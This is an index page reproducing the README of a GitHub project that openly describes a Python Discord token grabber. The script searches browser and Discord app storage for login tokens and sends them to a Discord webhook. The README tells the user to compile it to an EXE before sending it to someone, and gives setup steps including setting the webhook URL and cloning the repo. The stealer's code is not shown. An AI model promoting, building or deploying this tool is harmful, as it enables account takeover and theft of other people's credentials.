Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/zentonik/easytokengrabber

script is designed to extract Discord tokens from storage files across browsers and the Discord desktop app.
https://github.com/zentonik/easytokengrabber

cheats discord grabber nitro token tokengrabber

Last synced: about 1 month ago
JSON representation

script is designed to extract Discord tokens from storage files across browsers and the Discord desktop app.

Awesome Lists containing this project

README

        

# Discord Token Extractor and Logger
## YOU NEED TO MAKE THIS AN EXE FILE BEFORE SENDING IT TO SOMEBODY

## Description

This Python script extracts Discord tokens from local storage files across various browsers and the Discord desktop application. It searches for tokens stored in `.ldb` and `.log` files and sends any found tokens to a specified Discord webhook for centralized logging or alerting.

## Supported Platforms

- **Google Chrome**
- **Mozilla Firefox**
- **Discord Desktop App**
- **Opera GX**

## Features

- **Multi-Browser Support**: Extracts tokens from multiple browsers and the Discord desktop application.
- **File Handling**: Searches through `.ldb` and `.log` files.
- **Webhook Integration**: Sends extracted tokens to a Discord webhook.
- **Error Handling**: Reports any issues encountered during token extraction or webhook interaction.

## Usage

1. **Update Webhook URL**: Replace the placeholder URL in the script with your actual Discord webhook URL.

```python
webhook_url = 'https://discord.com/api/webhooks/your_webhook_id/your_webhook_token'
```

2. **Run the Script**: Execute the script using Python.

```bash
python main.py
```

## Installation

1. **Clone the Repository**:

```bash
git clone https://github.com/zentonik/EasyTokenGrabber.git
cd EasyTokenGrabber
```

2. **Install Dependencies**:

Ensure Python is installed, then install the required dependencies:

```bash
pip install requests
```